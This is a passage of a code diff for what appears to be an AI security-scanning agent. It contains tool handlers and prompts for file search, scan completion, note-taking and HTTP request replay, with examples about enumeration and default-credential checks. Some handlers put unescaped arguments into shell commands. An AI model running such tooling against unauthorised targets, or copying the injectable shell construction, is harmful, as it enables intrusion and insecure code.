tool_name = tool_inv.get("toolName")
tool_args = tool_inv.get("args", {})
return await execute_tool_with_validation(tool_name, agent_state, **tool_args)
def _check_error_result(result: Any) -> tuple[bool, Any]:
is_error = False
error_payload: Any = None
if (isinstance(result, dict) and "error" in result) or (
isinstance(result, str) and result.strip().lower().startswith("error:")
):
is_error = True
error_payload = result
return is_error, error_payload
def _update_tracer_with_result(
tracer: Any, execution_id: Any, is_error: bool, result: Any, error_payload: Any
) -> None:
if not tracer or not execution_id:
return
try:
if is_error:
tracer.update_tool_execution(execution_id, "error", error_payload)
else:
tracer.update_tool_execution(execution_id, "completed", result)
except (ConnectionError, RuntimeError) as e:
tracer.update_tool_execution(execution_id, "error", str(e))
raise
def _format_tool_result(tool_name: str, result: Any) -> tuple[str, list[dict[str, Any]]]:
images: list[dict[str, Any]] = []
screenshot_data = extract_screenshot_from_result(result)
if screenshot_data:
images.append(
{
"type": "image_url",
"image_url": {"url": f"data:image/png;base64,{screenshot_data}"},
}
)
result_str = remove_screenshot_from_result(result)
else:
result_str = result
if result_str is None:
final_result_str = f"Tool {tool_name} executed successfully"
else:
final_result_str = str(result_str)
if len(final_result_str) > 10000:
start_part = final_result_str[:4000]
end_part = final_result_str[-4000:]
final_result_str = start_part + "\n\n... [middle content truncated] ...\n\n" + end_part
observation_xml = (
f"<tool_result>\n<tool_name>{tool_name}</tool_name>\n"
f"<result>{final_result_str}</result>\n</tool_result>"
)
return observation_xml, images
async def _execute_single_tool(
tool_inv: dict[str, Any],
agent_state: Any | None,
tracer: Any | None,
agent_id: str,
) -> tuple[str, list[dict[str, Any]], bool]:
tool_name = tool_inv.get("toolName", "unknown")
args = tool_inv.get("args", {})
execution_id = None
should_agent_finish = False
if tracer:
execution_id = tracer.log_tool_execution_start(agent_id, tool_name, args)
try:
result = await execute_tool_invocation(tool_inv, agent_state)
is_error, error_payload = _check_error_result(result)
if (
tool_name in ("finish_scan", "agent_finish")
and not is_error
and isinstance(result, dict)
):
if tool_name == "finish_scan":
should_agent_finish = result.get("scan_completed", False)
elif tool_name == "agent_finish":
should_agent_finish = result.get("agent_completed", False)
_update_tracer_with_result(tracer, execution_id, is_error, result, error_payload)
except (ConnectionError, RuntimeError, ValueError, TypeError, OSError) as e:
error_msg = str(e)
if tracer and execution_id:
tracer.update_tool_execution(execution_id, "error", error_msg)
raise
observation_xml, images = _format_tool_result(tool_name, result)
return observation_xml, images, should_agent_finish
def _get_tracer_and_agent_id(agent_state: Any | None) -> tuple[Any | None, str]:
try:
from strix.cli.tracer import get_global_tracer
tracer = get_global_tracer()
agent_id = agent_state.agent_id if agent_state else "unknown_agent"
except (ImportError, AttributeError):
tracer = None
agent_id = "unknown_agent"
return tracer, agent_id
async def process_tool_invocations(
tool_invocations: list[dict[str, Any]],
conversation_history: list[dict[str, Any]],
agent_state: Any | None = None,
) -> bool:
observation_parts: list[str] = []
all_images: list[dict[str, Any]] = []
should_agent_finish = False
tracer, agent_id = _get_tracer_and_agent_id(agent_state)
for tool_inv in tool_invocations:
observation_xml, images, tool_should_finish = await _execute_single_tool(
tool_inv, agent_state, tracer, agent_id
)
observation_parts.append(observation_xml)
all_images.extend(images)
if tool_should_finish:
should_agent_finish = True
if all_images:
content = [{"type": "text", "text": "Tool Results:\n\n" + "\n\n".join(observation_parts)}]
content.extend(all_images)
conversation_history.append({"role": "user", "content": content})
else:
observation_content = "Tool Results:\n\n" + "\n\n".join(observation_parts)
conversation_history.append({"role": "user", "content": observation_content})
return should_agent_finish
def extract_screenshot_from_result(result: Any) -> str | None:
if not isinstance(result, dict):
return None
screenshot = result.get("screenshot")
if isinstance(screenshot, str) and screenshot:
return screenshot
return None
def remove_screenshot_from_result(result: Any) -> Any:
if not isinstance(result, dict):
return result
result_copy = result.copy()
if "screenshot" in result_copy:
result_copy["screenshot"] = "[Image data extracted - see attached image]"
return result_copy

View File

@@ -0,0 +1,4 @@
from .file_edit_actions import list_files, search_files, str_replace_editor
__all__ = ["list_files", "search_files", "str_replace_editor"]

View File

@@ -0,0 +1,141 @@
import json
import re
from pathlib import Path
from typing import Any, cast
from openhands_aci import file_editor
from openhands_aci.utils.shell import run_shell_cmd
from strix.tools.registry import register_tool
def _parse_file_editor_output(output: str) -> dict[str, Any]:
try:
pattern = r"<oh_aci_output_[^>]+>\n(.*?)\n</oh_aci_output_[^>]+>"
match = re.search(pattern, output, re.DOTALL)
if match:
json_str = match.group(1)
data = json.loads(json_str)
return cast("dict[str, Any]", data)
return {"output": output, "error": None}
except (json.JSONDecodeError, AttributeError):
return {"output": output, "error": None}
@register_tool
def str_replace_editor(
command: str,
path: str,
file_text: str | None = None,
view_range: list[int] | None = None,
old_str: str | None = None,
new_str: str | None = None,
insert_line: int | None = None,
) -> dict[str, Any]:
try:
path_obj = Path(path)
if not path_obj.is_absolute():
path = str(Path("/workspace") / path_obj)
result = file_editor(
command=command,
path=path,
file_text=file_text,
view_range=view_range,
old_str=old_str,
new_str=new_str,
insert_line=insert_line,
)
parsed = _parse_file_editor_output(result)
if parsed.get("error"):
return {"error": parsed["error"]}
return {"content": parsed.get("output", result)}
except (OSError, ValueError) as e:
return {"error": f"Error in {command} operation: {e!s}"}
@register_tool
def list_files(
path: str,
recursive: bool = False,
) -> dict[str, Any]:
try:
path_obj = Path(path)
if not path_obj.is_absolute():
path = str(Path("/workspace") / path_obj)
path_obj = Path(path)
if not path_obj.exists():
return {"error": f"Directory not found: {path}"}
if not path_obj.is_dir():
return {"error": f"Path is not a directory: {path}"}
cmd = f"find '{path}' -type f -o -type d | head -500" if recursive else f"ls -1a '{path}'"
exit_code, stdout, stderr = run_shell_cmd(cmd)
if exit_code != 0:
return {"error": f"Error listing directory: {stderr}"}
items = stdout.strip().split("\n") if stdout.strip() else []
files = []
dirs = []
for item in items:
item_path = item if recursive else str(Path(path) / item)
item_path_obj = Path(item_path)
if item_path_obj.is_file():
files.append(item)
elif item_path_obj.is_dir():
dirs.append(item)
return {
"files": sorted(files),
"directories": sorted(dirs),
"total_files": len(files),
"total_dirs": len(dirs),
"path": path,
"recursive": recursive,
}
except (OSError, ValueError) as e:
return {"error": f"Error listing directory: {e!s}"}
@register_tool
def search_files(
path: str,
regex: str,
file_pattern: str = "*",
) -> dict[str, Any]:
try:
path_obj = Path(path)
if not path_obj.is_absolute():
path = str(Path("/workspace") / path_obj)
if not Path(path).exists():
return {"error": f"Directory not found: {path}"}
escaped_regex = regex.replace("'", "'\"'\"'")
cmd = f"rg --line-number --glob '{file_pattern}' '{escaped_regex}' '{path}'"
exit_code, stdout, stderr = run_shell_cmd(cmd)
if exit_code not in {0, 1}:
return {"error": f"Error searching files: {stderr}"}
return {"output": stdout if stdout else "No matches found"}
except (OSError, ValueError) as e:
return {"error": f"Error searching files: {e!s}"}
# ruff: noqa: TRY300
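`_parse_file_editor_output` above assumes the `openhands_aci` editor wraps its JSON result in an `<oh_aci_output_*>` tag pair and falls back to returning the raw text when that wrapper (or its JSON payload) is missing or malformed. A self-contained sketch of the same extraction — the wrapper tag suffix `abc123` here is illustrative:

```python
import json
import re
from typing import Any, cast


def parse_file_editor_output(output: str) -> dict[str, Any]:
    # Pull the JSON payload out of the <oh_aci_output_*> wrapper; fall back
    # to wrapping the raw text when no well-formed payload is found.
    pattern = r"<oh_aci_output_[^>]+>\n(.*?)\n</oh_aci_output_[^>]+>"
    match = re.search(pattern, output, re.DOTALL)
    if match:
        try:
            return cast("dict[str, Any]", json.loads(match.group(1)))
        except json.JSONDecodeError:
            pass
    return {"output": output, "error": None}


wrapped = '<oh_aci_output_abc123>\n{"output": "file created", "error": null}\n</oh_aci_output_abc123>'
print(parse_file_editor_output(wrapped))       # parsed JSON payload
print(parse_file_editor_output("plain text"))  # fallback: raw text, no error
```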

View File

@@ -0,0 +1,128 @@
<tools>
<tool name="list_files">
<description>List files and directories within the specified directory.</description>
<parameters>
<parameter name="path" type="string" required="true">
<description>Directory path to list</description>
</parameter>
<parameter name="recursive" type="boolean" required="false">
<description>Whether to list files recursively</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing: - files: List of files - directories: List of directories - total_files: Total number of files found - total_dirs: Total number of directories found</description>
</returns>
<notes>
- Lists contents alphabetically
- Recursive listings are capped at 500 results to avoid overwhelming output
</notes>
<examples>
# List directory contents
<function=list_files>
<parameter=path>/home/user/project/src</parameter>
</function>
# Recursive listing
<function=list_files>
<parameter=path>/home/user/project/src</parameter>
<parameter=recursive>true</parameter>
</function>
</examples>
</tool>
<tool name="search_files">
<description>Perform a regex search across files in a directory.</description>
<parameters>
<parameter name="path" type="string" required="true">
<description>Directory path to search</description>
</parameter>
<parameter name="regex" type="string" required="true">
<description>Regular expression pattern to search for</description>
</parameter>
<parameter name="file_pattern" type="string" required="false">
<description>File pattern to filter (e.g., "*.py", "*.js")</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing: - output: The search results as a string</description>
</returns>
<notes>
- Searches recursively through subdirectories
- Uses ripgrep for fast searching
</notes>
<examples>
# Search Python files for a pattern
<function=search_files>
<parameter=path>/home/user/project/src</parameter>
<parameter=regex>def\s+process_data</parameter>
<parameter=file_pattern>*.py</parameter>
</function>
</examples>
</tool>
<tool name="str_replace_editor">
<description>A text editor tool for viewing, creating and editing files.</description>
<parameters>
<parameter name="command" type="string" required="true">
<description>Editor command to execute</description>
</parameter>
<parameter name="path" type="string" required="true">
<description>Path to the file to edit</description>
</parameter>
<parameter name="file_text" type="string" required="false">
<description>Required parameter of create command, with the content of the file to be created</description>
</parameter>
<parameter name="view_range" type="list" required="false">
<description>Optional parameter of view command when path points to a file. If none is given, the full file is shown. If provided, the file will be shown in the indicated line number range, e.g. [11, 12] will show lines 11 and 12. Indexing at 1 to start. Setting [start_line, -1] shows all lines from start_line to the end of the file</description>
</parameter>
<parameter name="old_str" type="string" required="false">
<description>Required parameter of str_replace command containing the string in path to replace</description>
</parameter>
<parameter name="new_str" type="string" required="false">
<description>Optional parameter of str_replace command containing the new string (if not given, no string will be added). Required parameter of insert command containing the string to insert</description>
</parameter>
<parameter name="insert_line" type="integer" required="false">
<description>Required parameter of insert command. The new_str will be inserted AFTER the line insert_line of path</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing the result of the operation</description>
</returns>
<notes>
Command details:
- view: Show file contents, optionally with line range
- create: Create a new file with given content
- str_replace: Replace old_str with new_str in file
- insert: Insert new_str after the specified line number
- undo_edit: Revert the last edit made to the file
</notes>
<examples>
# View a file
<function=str_replace_editor>
<parameter=command>view</parameter>
<parameter=path>/home/user/project/file.py</parameter>
</function>
# Create a file
<function=str_replace_editor>
<parameter=command>create</parameter>
<parameter=path>/home/user/project/new_file.py</parameter>
<parameter=file_text>print("Hello World")</parameter>
</function>
# Replace text in file
<function=str_replace_editor>
<parameter=command>str_replace</parameter>
<parameter=path>/home/user/project/file.py</parameter>
<parameter=old_str>old_function()</parameter>
<parameter=new_str>new_function()</parameter>
</function>
# Insert text after line 10
<function=str_replace_editor>
<parameter=command>insert</parameter>
<parameter=path>/home/user/project/file.py</parameter>
<parameter=insert_line>10</parameter>
<parameter=new_str>print("Inserted line")</parameter>
</function>
</examples>
</tool>
</tools>

View File

@@ -0,0 +1,4 @@
from .finish_actions import finish_scan
__all__ = ["finish_scan"]

View File

@@ -0,0 +1,174 @@
from typing import Any
from strix.tools.registry import register_tool
def _validate_root_agent(agent_state: Any) -> dict[str, Any] | None:
if (
agent_state is not None
and hasattr(agent_state, "parent_id")
and agent_state.parent_id is not None
):
return {
"success": False,
"message": (
"This tool can only be used by the root/main agent. "
"Subagents must use agent_finish instead."
),
}
return None
def _validate_content(content: str) -> dict[str, Any] | None:
if not content or not content.strip():
return {"success": False, "message": "Content cannot be empty"}
return None
def _check_active_agents(agent_state: Any = None) -> dict[str, Any] | None:
try:
from strix.tools.agents_graph.agents_graph_actions import _agent_graph
current_agent_id = None
if agent_state and hasattr(agent_state, "agent_id"):
current_agent_id = agent_state.agent_id
running_agents = []
stopping_agents = []
for agent_id, node in _agent_graph.get("nodes", {}).items():
if agent_id == current_agent_id:
continue
status = node.get("status", "")
if status == "running":
running_agents.append(
{
"id": agent_id,
"name": node.get("name", "Unknown"),
"task": node.get("task", "No task description"),
}
)
elif status == "stopping":
stopping_agents.append(
{
"id": agent_id,
"name": node.get("name", "Unknown"),
}
)
if running_agents or stopping_agents:
message_parts = ["Cannot finish scan while other agents are still active:"]
if running_agents:
message_parts.append("\n\nRunning agents:")
message_parts.extend(
[
f" - {agent['name']} ({agent['id']}): {agent['task']}"
for agent in running_agents
]
)
if stopping_agents:
message_parts.append("\n\nStopping agents:")
message_parts.extend(
[f" - {agent['name']} ({agent['id']})" for agent in stopping_agents]
)
message_parts.extend(
[
"\n\nSuggested actions:",
"1. Use wait_for_message to wait for all agents to complete",
"2. Send messages to agents asking them to finish if urgent",
"3. Use view_agent_graph to monitor agent status",
]
)
return {
"success": False,
"message": "\n".join(message_parts),
"active_agents": {
"running": len(running_agents),
"stopping": len(stopping_agents),
"details": {
"running": running_agents,
"stopping": stopping_agents,
},
},
}
except ImportError:
import logging
logging.warning("Could not check agent graph status - agents_graph module unavailable")
return None
def _finalize_with_tracer(content: str, success: bool) -> dict[str, Any]:
try:
from strix.cli.tracer import get_global_tracer
tracer = get_global_tracer()
if tracer:
tracer.set_final_scan_result(
content=content.strip(),
success=success,
)
return {
"success": True,
"scan_completed": True,
"message": "Scan completed successfully"
if success
else "Scan completed with errors",
"vulnerabilities_found": len(tracer.vulnerability_reports),
}
import logging
logging.warning("Global tracer not available - final scan result not stored")
return { # noqa: TRY300
"success": True,
"scan_completed": True,
"message": "Scan completed successfully (not persisted)"
if success
else "Scan completed with errors (not persisted)",
"warning": "Final result could not be persisted - tracer unavailable",
}
except ImportError:
return {
"success": True,
"scan_completed": True,
"message": "Scan completed successfully (not persisted)"
if success
else "Scan completed with errors (not persisted)",
"warning": "Final result could not be persisted - tracer module unavailable",
}
@register_tool(sandbox_execution=False)
def finish_scan(
content: str,
success: bool = True,
agent_state: Any = None,
) -> dict[str, Any]:
try:
validation_error = _validate_root_agent(agent_state)
if validation_error:
return validation_error
validation_error = _validate_content(content)
if validation_error:
return validation_error
active_agents_error = _check_active_agents(agent_state)
if active_agents_error:
return active_agents_error
return _finalize_with_tracer(content, success)
except (ValueError, TypeError, KeyError) as e:
return {"success": False, "message": f"Failed to complete scan: {e!s}"}

View File

@@ -0,0 +1,45 @@
<tools>
<tool name="finish_scan">
<description>Complete the main security scan and generate final report.
IMPORTANT: This tool can ONLY be used by the root/main agent.
Subagents must use agent_finish from agents_graph tool instead.
IMPORTANT: This tool will NOT allow finishing if any agents are still running or stopping.
You must wait for all agents to complete before using this tool.
This tool MUST be called at the very end of the security assessment to:
- Verify all agents have completed their tasks
- Generate the final comprehensive scan report
- Mark the entire scan as completed
- Stop the agent from running
Use this tool when:
- You are the main/root agent conducting the security assessment
- ALL subagents have completed their tasks (no agents are "running" or "stopping")
- You have completed all testing phases
- You are ready to conclude the entire security assessment
IMPORTANT: Calling this tool multiple times will OVERWRITE any previous scan report.
Make sure you include ALL findings and details in a single comprehensive report.
If agents are still running, this tool will:
- Show you which agents are still active
- Suggest using wait_for_message to wait for completion
- Suggest messaging agents if immediate completion is needed
Put ALL details in the content - methodology, tools used, vulnerability counts, key findings, recommendations,
compliance notes, risk assessments, next steps, etc. Be comprehensive and include everything relevant.</description>
<parameters>
<parameter name="content" type="string" required="true">
<description>Complete scan report including executive summary, methodology, findings, vulnerability details, recommendations, compliance notes, risk assessment, and conclusions. Include everything relevant to the assessment.</description>
</parameter>
<parameter name="success" type="boolean" required="false">
<description>Whether the scan completed successfully without critical errors</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing success status and completion message. If agents are still running, returns details about active agents and suggested actions.</description>
</returns>
</tool>
</tools>

View File

@@ -0,0 +1,14 @@
from .notes_actions import (
create_note,
delete_note,
list_notes,
update_note,
)
__all__ = [
"create_note",
"delete_note",
"list_notes",
"update_note",
]

View File

@@ -0,0 +1,191 @@
import uuid
from datetime import UTC, datetime
from typing import Any
from strix.tools.registry import register_tool
_notes_storage: dict[str, dict[str, Any]] = {}
def _filter_notes(
category: str | None = None,
tags: list[str] | None = None,
priority: str | None = None,
search_query: str | None = None,
) -> list[dict[str, Any]]:
filtered_notes = []
for note_id, note in _notes_storage.items():
if category and note.get("category") != category:
continue
if priority and note.get("priority") != priority:
continue
if tags:
note_tags = note.get("tags", [])
if not any(tag in note_tags for tag in tags):
continue
if search_query:
search_lower = search_query.lower()
title_match = search_lower in note.get("title", "").lower()
content_match = search_lower in note.get("content", "").lower()
if not (title_match or content_match):
continue
note_with_id = note.copy()
note_with_id["note_id"] = note_id
filtered_notes.append(note_with_id)
filtered_notes.sort(key=lambda x: x.get("created_at", ""), reverse=True)
return filtered_notes
@register_tool
def create_note(
title: str,
content: str,
category: str = "general",
tags: list[str] | None = None,
priority: str = "normal",
) -> dict[str, Any]:
try:
if not title or not title.strip():
return {"success": False, "error": "Title cannot be empty", "note_id": None}
if not content or not content.strip():
return {"success": False, "error": "Content cannot be empty", "note_id": None}
valid_categories = ["general", "findings", "methodology", "todo", "questions", "plan"]
if category not in valid_categories:
return {
"success": False,
"error": f"Invalid category. Must be one of: {', '.join(valid_categories)}",
"note_id": None,
}
valid_priorities = ["low", "normal", "high", "urgent"]
if priority not in valid_priorities:
return {
"success": False,
"error": f"Invalid priority. Must be one of: {', '.join(valid_priorities)}",
"note_id": None,
}
note_id = str(uuid.uuid4())[:5]
timestamp = datetime.now(UTC).isoformat()
note = {
"title": title.strip(),
"content": content.strip(),
"category": category,
"tags": tags or [],
"priority": priority,
"created_at": timestamp,
"updated_at": timestamp,
}
_notes_storage[note_id] = note
except (ValueError, TypeError) as e:
return {"success": False, "error": f"Failed to create note: {e}", "note_id": None}
else:
return {
"success": True,
"note_id": note_id,
"message": f"Note '{title}' created successfully",
}
@register_tool
def list_notes(
category: str | None = None,
tags: list[str] | None = None,
priority: str | None = None,
search: str | None = None,
) -> dict[str, Any]:
try:
filtered_notes = _filter_notes(
category=category, tags=tags, priority=priority, search_query=search
)
return {
"success": True,
"notes": filtered_notes,
"total_count": len(filtered_notes),
}
except (ValueError, TypeError) as e:
return {
"success": False,
"error": f"Failed to list notes: {e}",
"notes": [],
"total_count": 0,
}
@register_tool
def update_note(
note_id: str,
title: str | None = None,
content: str | None = None,
tags: list[str] | None = None,
priority: str | None = None,
) -> dict[str, Any]:
try:
if note_id not in _notes_storage:
return {"success": False, "error": f"Note with ID '{note_id}' not found"}
note = _notes_storage[note_id]
if title is not None:
if not title.strip():
return {"success": False, "error": "Title cannot be empty"}
note["title"] = title.strip()
if content is not None:
if not content.strip():
return {"success": False, "error": "Content cannot be empty"}
note["content"] = content.strip()
if tags is not None:
note["tags"] = tags
if priority is not None:
valid_priorities = ["low", "normal", "high", "urgent"]
if priority not in valid_priorities:
return {
"success": False,
"error": f"Invalid priority. Must be one of: {', '.join(valid_priorities)}",
}
note["priority"] = priority
note["updated_at"] = datetime.now(UTC).isoformat()
return {
"success": True,
"message": f"Note '{note['title']}' updated successfully",
}
except (ValueError, TypeError) as e:
return {"success": False, "error": f"Failed to update note: {e}"}
@register_tool
def delete_note(note_id: str) -> dict[str, Any]:
try:
if note_id not in _notes_storage:
return {"success": False, "error": f"Note with ID '{note_id}' not found"}
note_title = _notes_storage[note_id]["title"]
del _notes_storage[note_id]
except (ValueError, TypeError) as e:
return {"success": False, "error": f"Failed to delete note: {e}"}
else:
return {
"success": True,
"message": f"Note '{note_title}' deleted successfully",
}

View File

@@ -0,0 +1,150 @@
<tools>
<tool name="create_note">
<description>Create a personal note for TODOs, side notes, plans, and organizational purposes during
the scan.</description>
<details>Use this tool for quick reminders, action items, planning thoughts, and organizational notes
rather than formal vulnerability reports or detailed findings. This is your personal notepad
for keeping track of tasks, ideas, and things to remember or follow up on.</details>
<parameters>
<parameter name="title" type="string" required="true">
<description>Title of the note</description>
</parameter>
<parameter name="content" type="string" required="true">
<description>Content of the note</description>
</parameter>
<parameter name="category" type="string" required="false">
<description>Category to organize the note. One of: "general" (default), "findings", "methodology", "todo", "questions", "plan"</description>
</parameter>
<parameter name="tags" type="list" required="false">
<description>Tags for categorization</description>
</parameter>
<parameter name="priority" type="string" required="false">
<description>Priority level of the note ("low", "normal", "high", "urgent")</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing: - note_id: ID of the created note - success: Whether the note was created successfully</description>
</returns>
<examples>
# Create a TODO reminder
<function=create_note>
<parameter=title>TODO: Check SSL Certificate Details</parameter>
<parameter=content>Remember to verify SSL certificate validity and check for weak ciphers
on the HTTPS service discovered on port 443. Also check for certificate
transparency logs.</parameter>
<parameter=category>todo</parameter>
<parameter=tags>["ssl", "certificate", "followup"]</parameter>
<parameter=priority>normal</parameter>
</function>
# Planning note
<function=create_note>
<parameter=title>Scan Strategy Planning</parameter>
<parameter=content>Plan for next phase: 1) Complete subdomain enumeration 2) Test discovered
web apps for OWASP Top 10 3) Check database services for default creds
4) Review any custom applications for business logic flaws</parameter>
<parameter=category>plan</parameter>
<parameter=tags>["planning", "strategy", "next_steps"]</parameter>
</function>
# Side note for later investigation
<function=create_note>
<parameter=title>Interesting Directory Found</parameter>
<parameter=content>Found /backup/ directory that might contain sensitive files. Low priority
for now but worth checking if time permits. Directory listing seems
disabled.</parameter>
<parameter=category>findings</parameter>
<parameter=tags>["directory", "backup", "low_priority"]</parameter>
<parameter=priority>low</parameter>
</function>
</examples>
</tool>
<tool name="delete_note">
<description>Delete a note.</description>
<parameters>
<parameter name="note_id" type="string" required="true">
<description>ID of the note to delete</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing: - success: Whether the note was deleted successfully</description>
</returns>
<examples>
<function=delete_note>
<parameter=note_id>note_123</parameter>
</function>
</examples>
</tool>
<tool name="list_notes">
<description>List existing notes with optional filtering and search.</description>
<parameters>
<parameter name="category" type="string" required="false">
<description>Filter by category</description>
</parameter>
<parameter name="tags" type="list" required="false">
<description>Filter by tags (returns notes with any of these tags)</description>
</parameter>
<parameter name="priority" type="string" required="false">
<description>Filter by priority level</description>
</parameter>
<parameter name="search" type="string" required="false">
<description>Search query to find in note titles and content</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing: - notes: List of matching notes - total_count: Total number of notes found</description>
</returns>
<examples>
# List all findings
<function=list_notes>
<parameter=category>findings</parameter>
</function>
# List high priority items
<function=list_notes>
<parameter=priority>high</parameter>
</function>
# Search for SQL injection related notes
<function=list_notes>
<parameter=search>SQL injection</parameter>
</function>
# Search within a specific category
<function=list_notes>
<parameter=search>admin</parameter>
<parameter=category>findings</parameter>
</function>
</examples>
</tool>
<tool name="update_note">
<description>Update an existing note.</description>
<parameters>
<parameter name="note_id" type="string" required="true">
<description>ID of the note to update</description>
</parameter>
<parameter name="title" type="string" required="false">
<description>New title for the note</description>
</parameter>
<parameter name="content" type="string" required="false">
<description>New content for the note</description>
</parameter>
<parameter name="tags" type="list" required="false">
<description>New tags for the note</description>
</parameter>
<parameter name="priority" type="string" required="false">
<description>New priority level</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing: - success: Whether the note was updated successfully</description>
</returns>
<examples>
<function=update_note>
<parameter=note_id>note_123</parameter>
<parameter=content>Updated content with new findings...</parameter>
<parameter=priority>urgent</parameter>
</function>
</examples>
</tool>
</tools>

View File

@@ -0,0 +1,20 @@
from .proxy_actions import (
list_requests,
list_sitemap,
repeat_request,
scope_rules,
send_request,
view_request,
view_sitemap_entry,
)
__all__ = [
"list_requests",
"list_sitemap",
"repeat_request",
"scope_rules",
"send_request",
"view_request",
"view_sitemap_entry",
]

View File

@@ -0,0 +1,101 @@
from typing import Any, Literal
from strix.tools.registry import register_tool
from .proxy_manager import get_proxy_manager
RequestPart = Literal["request", "response"]
@register_tool
def list_requests(
httpql_filter: str | None = None,
start_page: int = 1,
end_page: int = 1,
page_size: int = 50,
sort_by: Literal[
"timestamp",
"host",
"method",
"path",
"status_code",
"response_time",
"response_size",
"source",
] = "timestamp",
sort_order: Literal["asc", "desc"] = "desc",
scope_id: str | None = None,
) -> dict[str, Any]:
manager = get_proxy_manager()
return manager.list_requests(
httpql_filter, start_page, end_page, page_size, sort_by, sort_order, scope_id
)
@register_tool
def view_request(
request_id: str,
part: RequestPart = "request",
search_pattern: str | None = None,
page: int = 1,
page_size: int = 50,
) -> dict[str, Any]:
manager = get_proxy_manager()
return manager.view_request(request_id, part, search_pattern, page, page_size)
@register_tool
def send_request(
method: str,
url: str,
headers: dict[str, str] | None = None,
body: str = "",
timeout: int = 30,
) -> dict[str, Any]:
if headers is None:
headers = {}
manager = get_proxy_manager()
return manager.send_simple_request(method, url, headers, body, timeout)
@register_tool
def repeat_request(
request_id: str,
modifications: dict[str, Any] | None = None,
) -> dict[str, Any]:
if modifications is None:
modifications = {}
manager = get_proxy_manager()
return manager.repeat_request(request_id, modifications)
@register_tool
def scope_rules(
action: Literal["get", "list", "create", "update", "delete"],
allowlist: list[str] | None = None,
denylist: list[str] | None = None,
scope_id: str | None = None,
scope_name: str | None = None,
) -> dict[str, Any]:
manager = get_proxy_manager()
return manager.scope_rules(action, allowlist, denylist, scope_id, scope_name)
@register_tool
def list_sitemap(
scope_id: str | None = None,
parent_id: str | None = None,
depth: Literal["DIRECT", "ALL"] = "DIRECT",
page: int = 1,
) -> dict[str, Any]:
manager = get_proxy_manager()
return manager.list_sitemap(scope_id, parent_id, depth, page)
@register_tool
def view_sitemap_entry(
entry_id: str,
) -> dict[str, Any]:
manager = get_proxy_manager()
return manager.view_sitemap_entry(entry_id)
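The `modifications` dict accepted by `repeat_request` overlays selected fields of a captured request before replay. The real merge lives in the proxy manager; the sketch below is an illustrative approximation of the documented keys (url, headers, body), assuming headers are added/updated while the body is replaced wholesale:

```python
from typing import Any


def apply_modifications(
    original: dict[str, Any], modifications: dict[str, Any]
) -> dict[str, Any]:
    # Illustrative merge only -- the real logic lives in ProxyManager.
    modified = {**original, "headers": dict(original.get("headers", {}))}
    if "url" in modifications:
        modified["url"] = modifications["url"]
    if "headers" in modifications:
        # add/update individual headers, keep the rest
        modified["headers"].update(modifications["headers"])
    if "body" in modifications:
        # full replacement of the original body, per the docs
        modified["body"] = modifications["body"]
    return modified


captured = {
    "method": "POST",
    "url": "https://target.example/login",
    "headers": {"Content-Type": "application/json"},
    "body": '{"username":"user","password":"user"}',
}
replayed = apply_modifications(
    captured, {"body": '{"username":"admin","password":"admin"}'}
)
print(replayed["body"])     # modified payload
print(replayed["headers"])  # original headers preserved
```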

View File

@@ -0,0 +1,267 @@
<?xml version="1.0" ?>
<tools>
<tool name="list_requests">
<description>List and filter proxy requests using HTTPQL with pagination.</description>
<parameters>
<parameter name="httpql_filter" type="string" required="false">
<description>HTTPQL filter using Caido's syntax:
Integer fields (port, code, roundtrip, id) - eq, gt, gte, lt, lte, ne:
- resp.code.eq:200, resp.code.gte:400, req.port.eq:443
Text/byte fields (ext, host, method, path, query, raw) - cont, eq, ne, like, regex:
- req.method.eq:"POST", req.path.cont:"/api/", req.host.regex:".*\.com"
Date fields (created_at) - gt, lt with ISO formats:
- req.created_at.gt:"2024-01-01T00:00:00Z"
Special: source:intercept, preset:"name"</description>
</parameter>
<parameter name="start_page" type="integer" required="false">
<description>Starting page (1-based)</description>
</parameter>
<parameter name="end_page" type="integer" required="false">
<description>Ending page (1-based, inclusive)</description>
</parameter>
<parameter name="page_size" type="integer" required="false">
<description>Requests per page</description>
</parameter>
<parameter name="sort_by" type="string" required="false">
<description>Sort field from: "timestamp", "host", "method", "path", "status_code", "response_time", "response_size", "source"</description>
</parameter>
<parameter name="sort_order" type="string" required="false">
<description>Sort direction ("asc" or "desc")</description>
</parameter>
<parameter name="scope_id" type="string" required="false">
<description>Scope ID to filter requests (use scope_rules to manage scopes)</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing:
- 'requests': Request objects for page range
- 'total_count': Total matching requests
- 'start_page', 'end_page', 'page_size': Query parameters
- 'returned_count': Requests in response</description>
</returns>
<examples>
# POST requests to API with 200 responses
<function=list_requests>
<parameter=httpql_filter>req.method.eq:"POST" AND req.path.cont:"/api/" AND resp.code.eq:200</parameter>
<parameter=sort_by>response_time</parameter>
<parameter=scope_id>scope123</parameter>
</function>
# Requests within specific scope
<function=list_requests>
<parameter=scope_id>scope123</parameter>
<parameter=sort_by>timestamp</parameter>
</function>
</examples>
</tool>
<tool name="view_request">
<description>View request/response data with search and pagination.</description>
<parameters>
<parameter name="request_id" type="string" required="true">
<description>Request ID</description>
</parameter>
<parameter name="part" type="string" required="false">
<description>Which part to return ("request" or "response")</description>
</parameter>
<parameter name="search_pattern" type="string" required="false">
<description>Regex pattern to search content. Common patterns:
- API endpoints: /api/[a-zA-Z0-9._/-]+
- URLs: https?://[^\s<>"']+
- Parameters: [?&][a-zA-Z0-9_]+=([^&\s<>"']+)
- Reflections: search for the injected input value in the content</description>
</parameter>
<parameter name="page" type="integer" required="false">
<description>Page number for pagination</description>
</parameter>
<parameter name="page_size" type="integer" required="false">
<description>Lines per page</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>With search_pattern (COMPACT):
- 'matches': [{match, before, after, position}] - max 20
- 'total_matches': Total found
- 'truncated': If limited to 20
Without search_pattern (PAGINATION):
- 'content': Page content
- 'page': Current page
- 'showing_lines': Range display
- 'has_more': More pages available</description>
</returns>
<examples>
# Find API endpoints in response
<function=view_request>
<parameter=request_id>123</parameter>
<parameter=part>response</parameter>
